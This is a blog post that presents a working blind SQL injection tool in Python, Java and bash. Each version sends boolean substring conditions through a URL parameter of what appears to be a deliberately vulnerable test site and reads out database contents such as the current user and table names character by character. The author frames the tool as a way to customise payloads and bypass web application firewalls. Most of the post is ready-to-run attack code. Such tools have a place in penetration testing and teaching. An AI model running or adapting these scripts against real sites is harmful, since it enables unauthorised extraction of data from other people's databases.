Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)

This is the Java version I wrote. The URL and the length is hard coded. Enter the URL and compile, next run

java BSSQL 20 "select user()"


https://github.com/OsandaMalith/BSSQLi/blob/master/BSSQL.java

import java.net.*;
import java.io.*;

// CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
// https://creativecommons.org/licenses/by/2.0/
/*
The URL and the true string is being hardcoded. After compiling run like this:
java BSSQL 20 "select table_name from information_schema.tables where table_schema=database() limit 0,1"
Result:
artists
Done! 
*/

public class BSSQL {

    private static String url = "http://testphp.vulnweb.com/artists.php?artist=2"; // your payload
    private static String trueString = "Blad3"; // Text or html in the true condition
    private static String hex;
    private static char ch;

    public static void main(String[] args) throws Exception {
        int maxLength = 0;
        String payload = "";

        if (args.length < 2) {
            System.err.println("Usage: " + BSSQL.class.getName() + " length " + "\"payload\"");
            System.exit(1);
        }

        try {
            maxLength = Integer.parseInt(args[0]);
        } catch (NumberFormatException e) {
            System.err.println("Argument" + args[0] + " must be an integer.");
            System.exit(1);
        }

        payload = args[1];

        System.out.println("Result:");
        for (int j = 1; j <= maxLength; j++) {
            for (int i = 32; i < 127; i++) {
                if (Character.isUpperCase((char) i)) {
                    continue;
                }

                ch = (char) i;

                hex = String.format("0x%2x", (int) ch);

                String p = " and substring((" + payload + ")," + Integer.toString(j) + ",1)="
                        + hex + "-- -";
                String host = url + p;

                URL target = new URL(host);
                URLConnection conn = target.openConnection();
                // conn.setRequestProperty("Cookie", "name1=value1; name2=value2");
                conn.connect();

                BufferedReader in = new BufferedReader(new InputStreamReader(
                        conn.getInputStream()));

                String inputLine;
                while ((inputLine = in.readLine()) != null) {
                    if (inputLine.contains(trueString)) {
                        System.out.print(Character.toString((char) i));
                        break;
                    }
                }

                in.close();
            }
        }
        System.out.println("\nDone!");
    }
}

This is the bash version , it’s faster than the above two. https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.sh

#!/bin/bash
# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/
#./bssqli.sh 20 "select user()"

export URL="http://testphp.vulnweb.com/artists.php?artist=2"
export truestring="Blad3"
export maxlength=$1
export result=""
export query=$2
charset=`echo {0..9} {A..x} \. \: \, \- \_ \@`

for ((j=1;j<$maxlength;j+=1)); do
	for i in $charset; do
		export str=`echo -n $i| od -A n -t x1 |sed 's/ //g'`
		export hex=0x$str
		curl -s "$URL and substring(($query),$j,1)=$hex-- -" | grep "$truestring" &> /dev/null
		if [ "$?" == "0" ]
		then
			echo Found: $i
			export result+=$i
			break
		fi
	done
done

echo Result: $result
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s